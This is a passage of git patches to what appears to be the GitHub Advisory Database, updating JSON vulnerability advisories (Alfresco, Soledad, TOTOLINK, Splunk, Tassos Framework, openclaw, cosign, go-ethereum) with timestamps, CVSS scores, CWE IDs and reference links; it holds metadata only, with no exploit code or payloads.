b/advisories/unreviewed/2026/02/GHSA-j59q-24q8-ggc7/GHSA-j59q-24q8-ggc7.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-j59q-24q8-ggc7", - "modified": "2026-02-19T18:31:55Z", + "modified": "2026-02-20T15:31:00Z", "published": "2026-02-19T18:31:55Z", "aliases": [ "CVE-2026-26336" @@ -23,6 +23,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26336" }, + { + "type": "WEB", + "url": "https://connect.hyland.com/t5/alfresco-blog/cve-2026-26336-unauthenticated-arbitrary-file-read-in-alfresco/ba-p/496550" + }, { "type": "WEB", "url": "https://www.hyland.com/en/solutions/products/alfresco-platform" diff --git a/advisories/unreviewed/2026/02/GHSA-p97j-p47c-p6g9/GHSA-p97j-p47c-p6g9.json b/advisories/unreviewed/2026/02/GHSA-p97j-p47c-p6g9/GHSA-p97j-p47c-p6g9.json index 4cae2aebed17e..c427f0ffc3beb 100644 --- a/advisories/unreviewed/2026/02/GHSA-p97j-p47c-p6g9/GHSA-p97j-p47c-p6g9.json +++ b/advisories/unreviewed/2026/02/GHSA-p97j-p47c-p6g9/GHSA-p97j-p47c-p6g9.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-p97j-p47c-p6g9", - "modified": "2026-02-19T18:31:54Z", + "modified": "2026-02-20T15:31:00Z", "published": "2026-02-19T18:31:54Z", "aliases": [ "CVE-2026-27069" ], "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in PenciDesign Soledad soledad allows DOM-Based XSS.This issue affects Soledad: from n/a through <= 8.7.2.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-19T09:16:27Z" diff --git a/advisories/unreviewed/2026/02/GHSA-pqh8-xq2x-mwg2/GHSA-pqh8-xq2x-mwg2.json b/advisories/unreviewed/2026/02/GHSA-pqh8-xq2x-mwg2/GHSA-pqh8-xq2x-mwg2.json index 558cd8091de45..6474968ed61b9 100644 --- a/advisories/unreviewed/2026/02/GHSA-pqh8-xq2x-mwg2/GHSA-pqh8-xq2x-mwg2.json +++ b/advisories/unreviewed/2026/02/GHSA-pqh8-xq2x-mwg2/GHSA-pqh8-xq2x-mwg2.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-pqh8-xq2x-mwg2", - "modified": "2026-02-17T21:31:14Z", + "modified": "2026-02-20T15:31:00Z", "published": "2026-02-17T21:31:14Z", "aliases": [ "CVE-2026-26732" ], "details": "TOTOLINK A3002RU V2.1.1-B20211108.1455 was discovered to contain a stack-based buffer overflow via the vpnUser or vpnPassword` parameters in the formFilter function.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -20,8 +25,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-787" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-17T19:21:57Z" diff --git a/advisories/unreviewed/2026/02/GHSA-qvhf-98cj-8779/GHSA-qvhf-98cj-8779.json b/advisories/unreviewed/2026/02/GHSA-qvhf-98cj-8779/GHSA-qvhf-98cj-8779.json index 37c01fdb58dfe..85b9bfa417400 100644 --- a/advisories/unreviewed/2026/02/GHSA-qvhf-98cj-8779/GHSA-qvhf-98cj-8779.json +++ b/advisories/unreviewed/2026/02/GHSA-qvhf-98cj-8779/GHSA-qvhf-98cj-8779.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-qvhf-98cj-8779", - "modified": "2026-02-17T21:31:14Z", + "modified": "2026-02-20T15:31:00Z", "published": "2026-02-17T21:31:13Z", "aliases": [ "CVE-2026-26731" ], "details": "TOTOLINK A3002RU V2.1.1-B20211108.1455 was discovered to contain a stack-based buffer overflow via the routernamer`parameter in the formDnsv6 function.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -20,8 +25,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-787" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-17T19:21:57Z" diff --git a/advisories/unreviewed/2026/02/GHSA-v8wf-h34r-55f7/GHSA-v8wf-h34r-55f7.json b/advisories/unreviewed/2026/02/GHSA-v8wf-h34r-55f7/GHSA-v8wf-h34r-55f7.json new file mode 100644 index 0000000000000..1eb7117edd702 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-v8wf-h34r-55f7/GHSA-v8wf-h34r-55f7.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v8wf-h34r-55f7", + "modified": "2026-02-20T15:31:00Z", + "published": "2026-02-18T18:30:40Z", + "aliases": [ + "CVE-2026-20138" + ], + "details": "In Splunk Enterprise versions below 10.2.0, 10.0.2, 9.4.7, 9.3.9, and 9.2.11, a user of a Splunk Search Head Cluster (SHC) deployment who holds a role with access to the Splunk `_internal` index could view the `integrationKey`, `secretKey`, and `appSecretKey` secrets, generated by [Duo Two-Factor Authentication for Splunk Enterprise](https://duo.com/docs/splunk), in plain text.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20138" + }, + { + "type": "WEB", + "url": "https://advisory.splunk.com/advisories/SVD-2026-0203" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-532" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T18:24:23Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-w8hr-79rx-368j/GHSA-w8hr-79rx-368j.json b/advisories/unreviewed/2026/02/GHSA-w8hr-79rx-368j/GHSA-w8hr-79rx-368j.json index 0d232faec0419..d7d96e2f567ed 100644 --- a/advisories/unreviewed/2026/02/GHSA-w8hr-79rx-368j/GHSA-w8hr-79rx-368j.json +++ b/advisories/unreviewed/2026/02/GHSA-w8hr-79rx-368j/GHSA-w8hr-79rx-368j.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-w8hr-79rx-368j", - "modified": "2026-02-19T18:31:55Z", + "modified": "2026-02-20T15:31:00Z", "published": "2026-02-19T18:31:55Z", "aliases": [ "CVE-2026-26339" @@ -23,6 +23,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26339" }, + { + "type": "WEB", + "url": "https://connect.hyland.com/t5/alfresco-blog/security-update-cve-2026-26337-cve-2026-26338-cve-2026-26339/ba-p/496551" + }, { "type": "WEB", "url": "https://www.hyland.com/en/solutions/products/alfresco-platform" diff --git a/advisories/unreviewed/2026/02/GHSA-wc6r-7g4j-c7x4/GHSA-wc6r-7g4j-c7x4.json b/advisories/unreviewed/2026/02/GHSA-wc6r-7g4j-c7x4/GHSA-wc6r-7g4j-c7x4.json new file mode 100644 index 0000000000000..b67e9ddb08d8c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wc6r-7g4j-c7x4/GHSA-wc6r-7g4j-c7x4.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wc6r-7g4j-c7x4", + "modified": "2026-02-20T15:31:03Z", + "published": "2026-02-20T15:31:03Z", + "aliases": [ + "CVE-2026-21627" + ], + "details": "The vulnerability was rooted in how the Tassos Framework plugin handled specific AJAX requests through Joomla’s com_ajax entry point. Under certain conditions, internal framework functionality could be invoked without proper restriction.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-21627" + }, + { + "type": "WEB", + "url": "https://tassos.gr" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-284" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T15:20:29Z" + } +} \ No newline at end of file From e4ed87a04b9b705750042de7749d5595b85964cb Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 20 Feb 2026 16:45:24 +0000 Subject: [PATCH 07/77] Publish Advisories GHSA-4hg8-92x6-h2f3 GHSA-7q2j-c4q5-rm27 GHSA-7v42-g35v-xrch GHSA-8jpq-5h99-ff5r GHSA-g6q9-8fvw-f7rf GHSA-h3f9-mjwj-w476 GHSA-jrvc-8ff5-2f9f GHSA-pchc-86f6-8758 GHSA-wfqv-66vq-46rm --- .../GHSA-4hg8-92x6-h2f3/GHSA-4hg8-92x6-h2f3.json | 8 ++++++-- .../GHSA-7q2j-c4q5-rm27/GHSA-7q2j-c4q5-rm27.json | 8 ++++++-- .../GHSA-7v42-g35v-xrch/GHSA-7v42-g35v-xrch.json | 8 ++++++-- .../GHSA-8jpq-5h99-ff5r/GHSA-8jpq-5h99-ff5r.json | 8 ++++++-- .../GHSA-g6q9-8fvw-f7rf/GHSA-g6q9-8fvw-f7rf.json | 8 ++++++-- .../GHSA-h3f9-mjwj-w476/GHSA-h3f9-mjwj-w476.json | 8 ++++++-- .../GHSA-jrvc-8ff5-2f9f/GHSA-jrvc-8ff5-2f9f.json | 8 ++++++-- .../GHSA-pchc-86f6-8758/GHSA-pchc-86f6-8758.json | 12 ++++++++++-- .../GHSA-wfqv-66vq-46rm/GHSA-wfqv-66vq-46rm.json | 16 ++++++++++++++-- 9 files changed, 66 insertions(+), 18 deletions(-) diff --git a/advisories/github-reviewed/2026/02/GHSA-4hg8-92x6-h2f3/GHSA-4hg8-92x6-h2f3.json b/advisories/github-reviewed/2026/02/GHSA-4hg8-92x6-h2f3/GHSA-4hg8-92x6-h2f3.json index 3de18c6a5137c..0b9184be45e10 100644 --- a/advisories/github-reviewed/2026/02/GHSA-4hg8-92x6-h2f3/GHSA-4hg8-92x6-h2f3.json +++ b/advisories/github-reviewed/2026/02/GHSA-4hg8-92x6-h2f3/GHSA-4hg8-92x6-h2f3.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-4hg8-92x6-h2f3", - "modified": "2026-02-17T21:40:47Z", + "modified": "2026-02-20T16:44:19Z", "published": "2026-02-17T21:40:46Z", "aliases": [ "CVE-2026-26319" @@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-4hg8-92x6-h2f3" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26319" + }, { "type": "WEB", "url": "https://github.com/openclaw/openclaw/commit/29b587e73cbdc941caec573facd16e87d52f007b" @@ -64,6 +68,6 @@ "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2026-02-17T21:40:46Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-19T23:16:24Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-7q2j-c4q5-rm27/GHSA-7q2j-c4q5-rm27.json b/advisories/github-reviewed/2026/02/GHSA-7q2j-c4q5-rm27/GHSA-7q2j-c4q5-rm27.json index 04aca933c996c..b4eafbdedaa58 100644 --- a/advisories/github-reviewed/2026/02/GHSA-7q2j-c4q5-rm27/GHSA-7q2j-c4q5-rm27.json +++ b/advisories/github-reviewed/2026/02/GHSA-7q2j-c4q5-rm27/GHSA-7q2j-c4q5-rm27.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-7q2j-c4q5-rm27", - "modified": "2026-02-17T21:41:40Z", + "modified": "2026-02-20T16:44:25Z", "published": "2026-02-17T21:41:40Z", "aliases": [ "CVE-2026-26320" @@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-7q2j-c4q5-rm27" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26320" + }, { "type": "WEB", "url": "https://github.com/openclaw/openclaw/commit/28d9dd7a772501ccc3f71457b4adfee79084fe6f" @@ -60,6 +64,6 @@ "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2026-02-17T21:41:40Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-19T23:16:25Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-7v42-g35v-xrch/GHSA-7v42-g35v-xrch.json b/advisories/github-reviewed/2026/02/GHSA-7v42-g35v-xrch/GHSA-7v42-g35v-xrch.json index 8366aba3562b7..1f26b40e244be 100644 --- a/advisories/github-reviewed/2026/02/GHSA-7v42-g35v-xrch/GHSA-7v42-g35v-xrch.json +++ b/advisories/github-reviewed/2026/02/GHSA-7v42-g35v-xrch/GHSA-7v42-g35v-xrch.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-7v42-g35v-xrch", - "modified": "2026-02-17T21:29:34Z", + "modified": "2026-02-20T16:44:04Z", "published": "2026-02-17T21:29:34Z", "aliases": [ "CVE-2026-26275" @@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/junkurihara/httpsig-rs/security/advisories/GHSA-7v42-g35v-xrch" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26275" + }, { "type": "WEB", "url": "https://github.com/junkurihara/httpsig-rs/pull/14" @@ -69,6 +73,6 @@ "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2026-02-17T21:29:34Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-19T22:16:46Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-8jpq-5h99-ff5r/GHSA-8jpq-5h99-ff5r.json b/advisories/github-reviewed/2026/02/GHSA-8jpq-5h99-ff5r/GHSA-8jpq-5h99-ff5r.json index e93320993406d..652fef85408ba 100644 --- a/advisories/github-reviewed/2026/02/GHSA-8jpq-5h99-ff5r/GHSA-8jpq-5h99-ff5r.json +++ b/advisories/github-reviewed/2026/02/GHSA-8jpq-5h99-ff5r/GHSA-8jpq-5h99-ff5r.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-8jpq-5h99-ff5r", - "modified": "2026-02-17T21:41:52Z", + "modified": "2026-02-20T16:44:32Z", "published": "2026-02-17T21:41:52Z", "aliases": [ "CVE-2026-26321" @@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-8jpq-5h99-ff5r" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26321" + }, { "type": "WEB", "url": "https://github.com/openclaw/openclaw/commit/5b4121d6011a48c71e747e3c18197f180b872c5d" @@ -60,6 +64,6 @@ "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2026-02-17T21:41:52Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-19T23:16:25Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-g6q9-8fvw-f7rf/GHSA-g6q9-8fvw-f7rf.json b/advisories/github-reviewed/2026/02/GHSA-g6q9-8fvw-f7rf/GHSA-g6q9-8fvw-f7rf.json index c9fac9f32c3c5..a60c07bf392ff 100644 --- a/advisories/github-reviewed/2026/02/GHSA-g6q9-8fvw-f7rf/GHSA-g6q9-8fvw-f7rf.json +++ b/advisories/github-reviewed/2026/02/GHSA-g6q9-8fvw-f7rf/GHSA-g6q9-8fvw-f7rf.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-g6q9-8fvw-f7rf", - "modified": "2026-02-17T21:42:15Z", + "modified": "2026-02-20T16:44:39Z", "published": "2026-02-17T21:42:15Z", "aliases": [ "CVE-2026-26322" @@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-g6q9-8fvw-f7rf" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26322" + }, { "type": "WEB", "url": "https://github.com/openclaw/openclaw/commit/c5406e1d2434be2ef6eb4d26d8f1798d718713f4" @@ -60,6 +64,6 @@ "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2026-02-17T21:42:15Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-19T23:16:25Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-h3f9-mjwj-w476/GHSA-h3f9-mjwj-w476.json b/advisories/github-reviewed/2026/02/GHSA-h3f9-mjwj-w476/GHSA-h3f9-mjwj-w476.json index fefb15ed84ef3..93dd5e895bd1d 100644 --- a/advisories/github-reviewed/2026/02/GHSA-h3f9-mjwj-w476/GHSA-h3f9-mjwj-w476.json +++ b/advisories/github-reviewed/2026/02/GHSA-h3f9-mjwj-w476/GHSA-h3f9-mjwj-w476.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-h3f9-mjwj-w476", - "modified": "2026-02-17T21:42:49Z", + "modified": "2026-02-20T16:44:54Z", "published": "2026-02-17T21:42:49Z", "aliases": [ "CVE-2026-26325" @@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-h3f9-mjwj-w476" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26325" + }, { "type": "WEB", "url": "https://github.com/openclaw/openclaw/commit/cb3290fca32593956638f161d9776266b90ab891" @@ -60,6 +64,6 @@ "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2026-02-17T21:42:49Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-19T23:16:25Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-jrvc-8ff5-2f9f/GHSA-jrvc-8ff5-2f9f.json b/advisories/github-reviewed/2026/02/GHSA-jrvc-8ff5-2f9f/GHSA-jrvc-8ff5-2f9f.json index 231805f7ddbb7..2688ffa557d26 100644 --- a/advisories/github-reviewed/2026/02/GHSA-jrvc-8ff5-2f9f/GHSA-jrvc-8ff5-2f9f.json +++ b/advisories/github-reviewed/2026/02/GHSA-jrvc-8ff5-2f9f/GHSA-jrvc-8ff5-2f9f.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-jrvc-8ff5-2f9f", - "modified": "2026-02-17T21:42:40Z", + "modified": "2026-02-20T16:44:46Z", "published": "2026-02-17T21:42:40Z", "aliases": [ "CVE-2026-26324" @@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-jrvc-8ff5-2f9f" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26324" + }, { "type": "WEB", "url": "https://github.com/openclaw/openclaw/commit/c0c0e0f9aecb913e738742f73e091f2f72d39a19" @@ -60,6 +64,6 @@ "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2026-02-17T21:42:40Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-19T23:16:25Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-pchc-86f6-8758/GHSA-pchc-86f6-8758.json b/advisories/github-reviewed/2026/02/GHSA-pchc-86f6-8758/GHSA-pchc-86f6-8758.json index be7cb922e9814..72a7b9e871944 100644 --- a/advisories/github-reviewed/2026/02/GHSA-pchc-86f6-8758/GHSA-pchc-86f6-8758.json +++ b/advisories/github-reviewed/2026/02/GHSA-pchc-86f6-8758/GHSA-pchc-86f6-8758.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-pchc-86f6-8758", - "modified": "2026-02-17T21:33:51Z", + "modified": "2026-02-20T16:44:12Z", "published": "2026-02-17T21:33:51Z", "aliases": [ "CVE-2026-26316" @@ -59,6 +59,10 @@ "type": "WEB", "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-pchc-86f6-8758" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26316" + }, { "type": "WEB", "url": "https://github.com/openclaw/openclaw/commit/743f4b28495cdeb0d5bf76f6ebf4af01f6a02e5a" @@ -74,6 +78,10 @@ { "type": "WEB", "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.2.12" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.2.13" } ], "database_specific": { @@ -83,6 +91,6 @@ "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2026-02-17T21:33:51Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-19T22:16:47Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-wfqv-66vq-46rm/GHSA-wfqv-66vq-46rm.json b/advisories/github-reviewed/2026/02/GHSA-wfqv-66vq-46rm/GHSA-wfqv-66vq-46rm.json index e2adc95e0fa4e..9f5ca3cd7d3fe 100644 --- a/advisories/github-reviewed/2026/02/GHSA-wfqv-66vq-46rm/GHSA-wfqv-66vq-46rm.json +++ b/advisories/github-reviewed/2026/02/GHSA-wfqv-66vq-46rm/GHSA-wfqv-66vq-46rm.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-wfqv-66vq-46rm", - "modified": "2026-02-19T22:09:12Z", + "modified": "2026-02-20T16:43:55Z", "published": "2026-02-19T22:09:12Z", "aliases": [ "CVE-2026-24122" @@ -43,9 +43,21 @@ "type": "WEB", "url": "https://github.com/sigstore/cosign/security/advisories/GHSA-wfqv-66vq-46rm" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24122" + }, + { + "type": "WEB", + "url": "https://github.com/sigstore/cosign/commit/3c9a7363f563db76d78e2de2cabd945450f3781e" + }, { "type": "PACKAGE", "url": "https://github.com/sigstore/cosign" + }, + { + "type": "WEB", + "url": "https://github.com/sigstore/cosign/releases/tag/v3.0.5" } ], "database_specific": { @@ -55,6 +67,6 @@ "severity": "LOW", "github_reviewed": true, "github_reviewed_at": "2026-02-19T22:09:12Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-19T23:16:24Z" } } \ No newline at end of file From da86798a9812e7ef1f1cd1b3686858147f8db53e Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 20 Feb 2026 16:47:20 +0000 Subject: [PATCH 08/77] Publish Advisories GHSA-2gjw-fg97-vg3r GHSA-2qj5-gwg2-xwc4 GHSA-3fqr-4cg8-h96q GHSA-5r23-prx4-mqg3 GHSA-8mh7-phf8-xgfm GHSA-cv7m-c9jx-vg7q GHSA-fw7p-63qq-7hpr GHSA-g34w-4xqq-h79m GHSA-m6j8-rg6r-7mv8 GHSA-m7x8-2w3w-pr42 GHSA-pv58-549p-qh99 GHSA-wgm6-9rvv-3438 GHSA-xwjm-j929-xq7c --- .../GHSA-2gjw-fg97-vg3r/GHSA-2gjw-fg97-vg3r.json | 8 ++++++-- .../GHSA-2qj5-gwg2-xwc4/GHSA-2qj5-gwg2-xwc4.json | 8 ++++++-- .../GHSA-3fqr-4cg8-h96q/GHSA-3fqr-4cg8-h96q.json | 8 ++++++-- .../GHSA-5r23-prx4-mqg3/GHSA-5r23-prx4-mqg3.json | 8 ++++++-- .../GHSA-8mh7-phf8-xgfm/GHSA-8mh7-phf8-xgfm.json | 8 ++++++-- .../GHSA-cv7m-c9jx-vg7q/GHSA-cv7m-c9jx-vg7q.json | 8 ++++++-- .../GHSA-fw7p-63qq-7hpr/GHSA-fw7p-63qq-7hpr.json | 8 ++++++-- .../GHSA-g34w-4xqq-h79m/GHSA-g34w-4xqq-h79m.json | 8 ++++++-- .../GHSA-m6j8-rg6r-7mv8/GHSA-m6j8-rg6r-7mv8.json | 15 ++++++++++++--- .../GHSA-m7x8-2w3w-pr42/GHSA-m7x8-2w3w-pr42.json | 8 ++++++-- .../GHSA-pv58-549p-qh99/GHSA-pv58-549p-qh99.json | 8 ++++++-- .../GHSA-wgm6-9rvv-3438/GHSA-wgm6-9rvv-3438.json | 8 ++++++-- .../GHSA-xwjm-j929-xq7c/GHSA-xwjm-j929-xq7c.json | 8 ++++++-- 13 files changed, 84 insertions(+), 27 deletions(-) diff --git a/advisories/github-reviewed/2026/02/GHSA-2gjw-fg97-vg3r/GHSA-2gjw-fg97-vg3r.json b/advisories/github-reviewed/2026/02/GHSA-2gjw-fg97-vg3r/GHSA-2gjw-fg97-vg3r.json index b4beb8b27aa87..8bb5175975be1 100644 --- a/advisories/github-reviewed/2026/02/GHSA-2gjw-fg97-vg3r/GHSA-2gjw-fg97-vg3r.json +++ b/advisories/github-reviewed/2026/02/GHSA-2gjw-fg97-vg3r/GHSA-2gjw-fg97-vg3r.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-2gjw-fg97-vg3r", - "modified": "2026-02-18T22:35:15Z", + "modified": "2026-02-20T16:46:27Z", "published": "2026-02-18T22:35:15Z", "aliases": [ "CVE-2026-26314" @@ -43,6 +43,10 @@ "type": "WEB", "url": "https://github.com/ethereum/go-ethereum/security/advisories/GHSA-2gjw-fg97-vg3r" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26314" + }, { "type": "WEB", "url": "https://github.com/ethereum/go-ethereum/commit/895a8597cb16c02203e38707ed2d1da5c500fe60" @@ -63,6 +67,6 @@ "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2026-02-18T22:35:15Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-19T22:16:46Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-2qj5-gwg2-xwc4/GHSA-2qj5-gwg2-xwc4.json b/advisories/github-reviewed/2026/02/GHSA-2qj5-gwg2-xwc4/GHSA-2qj5-gwg2-xwc4.json index 1138be2d2fb6c..a0a0c5b5f1d21 100644 --- a/advisories/github-reviewed/2026/02/GHSA-2qj5-gwg2-xwc4/GHSA-2qj5-gwg2-xwc4.json +++ b/advisories/github-reviewed/2026/02/GHSA-2qj5-gwg2-xwc4/GHSA-2qj5-gwg2-xwc4.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-2qj5-gwg2-xwc4", - "modified": "2026-02-18T22:42:29Z", + "modified": "2026-02-20T16:46:56Z", "published": "2026-02-18T22:42:29Z", "aliases": [ "CVE-2026-27001" @@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-2qj5-gwg2-xwc4" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27001" + }, { "type": "WEB", "url": "https://github.com/openclaw/openclaw/commit/6254e96acf16e70ceccc8f9b2abecee44d606f79" @@ -60,6 +64,6 @@ "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2026-02-18T22:42:29Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-20T00:16:16Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-3fqr-4cg8-h96q/GHSA-3fqr-4cg8-h96q.json b/advisories/github-reviewed/2026/02/GHSA-3fqr-4cg8-h96q/GHSA-3fqr-4cg8-h96q.json index 54ea267f43b37..6dbb90ce41f2d 100644 --- a/advisories/github-reviewed/2026/02/GHSA-3fqr-4cg8-h96q/GHSA-3fqr-4cg8-h96q.json +++ b/advisories/github-reviewed/2026/02/GHSA-3fqr-4cg8-h96q/GHSA-3fqr-4cg8-h96q.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-3fqr-4cg8-h96q", - "modified": "2026-02-18T00:53:59Z", + "modified": "2026-02-20T16:46:03Z", "published": "2026-02-18T00:53:59Z", "aliases": [ "CVE-2026-26317" @@ -59,6 +59,10 @@ "type": "WEB", "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-3fqr-4cg8-h96q" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26317" + }, { "type": "WEB", "url": "https://github.com/openclaw/openclaw/commit/b566b09f81e2b704bf9398d8d97d5f7a90aa94c3" @@ -79,6 +83,6 @@ "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2026-02-18T00:53:59Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-19T22:16:47Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-5r23-prx4-mqg3/GHSA-5r23-prx4-mqg3.json b/advisories/github-reviewed/2026/02/GHSA-5r23-prx4-mqg3/GHSA-5r23-prx4-mqg3.json index c9edc47a779d1..9629a08520c74 100644 --- a/advisories/github-reviewed/2026/02/GHSA-5r23-prx4-mqg3/GHSA-5r23-prx4-mqg3.json +++ 